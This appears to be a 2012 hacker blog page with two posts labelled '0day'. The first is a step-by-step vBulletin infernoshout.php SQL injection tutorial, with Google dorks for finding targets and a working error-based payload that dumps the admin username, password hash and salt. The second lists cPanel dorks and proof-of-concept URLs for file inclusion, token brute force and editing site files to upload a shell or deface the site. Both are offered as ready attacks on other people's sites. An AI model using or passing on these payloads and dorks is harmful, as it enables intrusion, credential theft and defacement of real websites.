Showing posts with label 0day. Show all posts
Showing posts with label 0day. Show all posts

Saturday, September 1, 2012

vBulletin infernoshout.php (0day) Tutorial by Hitcher

[#] Author : Hitcher [0XF0XF]

STEP 1)- FINDING THE Vulnerable Forums Using Google DORKS.
Go to Google.com and TYPE :

INURL: infernoshout.php

OR inurl: infernoshout.php?do=options&area=commands

STEP 2)- FINDING THE SITE (Check the PICS)

STEP 3)- Goo Here Exploit link: http://site.com/infernoshout.php?do=options&area=commands


STEP 4)- INPUTTING THE CODE :
Go to the Commands Area where it says command Input and command output in the first Link
pass these commands :

COMMAND INPUT :


' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#

COMMAND OUTPUT :type anything there It doesnt really matter .
and Hit save setting.


STEP 5)- DATABASE ERROR :When you hit Save it will generate a DATABASE error and Press Control+ U you will get the source

STEP 6)-
VIEW SOURCE: press clt+u and scroll down the end of the page you will get the admin details

such as USERNAME:HASH:SALT

Demo:


Enjoy :) The Hack

Tuesday, July 24, 2012

POC Exploit CPanel (0day) By CyberCode Khorasan

Author    : CyberCode Khorasan [0xCCBF]
Thanks to : All Khorasan CyberArmy Member
Special to: Cep Engking, JinCorn, An0nym0uZ-17, cliZAceh, Hitcher, CFR, XTreMist, PKShadow, DR. Ninja, DB Bust3r

LFI
---------------------------------
DORK => inurl:/frontend/x3/filemanager/dir.html?dir=

Brute-Force Attack (md5-hash)
---------------------------------
DORK => inurl:/3rdparty/phpMyAdmin/index.php#PMAURL:server=1&target=main.php&token=[md5_hash]
POC  => http://[sites]/3rdparty/phpMyAdmin/index.php#PMAURL:server=1&target=main.php&token=[md5_hash]

Edit Files (upload shell / deface)
------------------------------------
DORK => inurl:/frontend/x3/filemanager/editit.html?file=
POC  => http://[sites]/frontend/x3/filemanager/editit.html?file=[file_name]&fileop=&dir=[path]&dirop=&charset=&file_charset=utf-8&baseurl=&basedir=

[file_name] = index.php, index.html, etc
[path]      = /home/[user]/